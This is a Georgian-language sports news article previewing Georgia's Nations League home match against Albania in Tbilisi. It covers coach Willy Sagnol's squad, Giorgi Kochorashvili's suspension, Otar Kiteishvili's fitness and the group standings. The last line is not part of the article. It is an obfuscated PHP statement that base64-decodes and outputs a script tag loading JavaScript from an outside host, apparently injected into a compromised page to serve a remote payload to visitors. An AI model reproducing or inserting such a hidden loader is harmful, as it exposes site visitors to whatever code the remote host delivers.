celsiusi
ავერსი საქკაბელი

 14 ოქტომბერს თბილისში, მიხეილ მესხის სახელობის სტადიონზე საქართველოს ეროვნული ნაკრები ერთა ლიგის მეოთხე  ტურის შეხვედრას ალბანეთის ნაკრების წინააღმდეგ გამართავს. მატჩი 20:00 საათზე დაიწყება.

შეგახსენებთ, რომ მიმდინარე ერთა ლიგის გათამაშებაში „ჯვაროსნებმა“ ალბანეთის ნაკრები ტირანაში გიორგი ქოჩორაშვილის გოლით 1:0 დაამარცხეს.

საქართველოს ნაკრები

ვილი სანიოლის გუნდმა ერთა ლიგაში საწყისი ორი მატჩი მოიგო და, უკრაინასთან წაგების მიუხედავად, 6 ქულით კვლავ ჯგუფის ლიდერია. ამდენივე ქულა აქვს ჩეხეთის ნაკრებსაც და „ჯვაროსნებს“ პირველი ადგილის შესანარჩუნებლად ალბანეთთან მოგება სჭირდებათ.

საქართველოს ნაკრებში საკადრო პრობლემებია – თამაშს დისკვალიფიკაციის გამო გიორგი ქოჩორაშვილი გამოტოვებს. უკრაინასთან შეხვედრის ბოლო წუთებზე კუნთმა შეაწუხა ოთარ კიტეიშვილი, მაგრამ, ვილი სანიოლის თქმით, ავსტრიის ბუნდესლიგის საუკეთესო მოთამაშის პრობლემა დაღლილობით იყო გამოწვეული, ახლა კი ოთარი თავს კარგად გრძნობს და, წესით, შეხვედრისთვის მზად იქნება.

საქართველოს ეროვნული ნაკრების მთავარი მწვრთნელი მიიჩნევს, რომ ალბანეთთან შეხვედრაში ტაქტიკურ ცვლილებებზე მნიშვნელოვანი თამაშის კარგად დაწყება და 90 წუთის განმავლობაში კონცენტრაციის შენარჩუნება იქნება.

ამ კუთხით მნიშვნელოვანია, მოახერხებს თუ არა გუნდი ძალების სწრაფად აღდგენას, რადგან სანაკრებო პაუზის დროს გუნდები თამაშებს სამდღიანი ინტერვალით ატარებენ.

ავტორი
სანდრო ჭითანავა
79
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");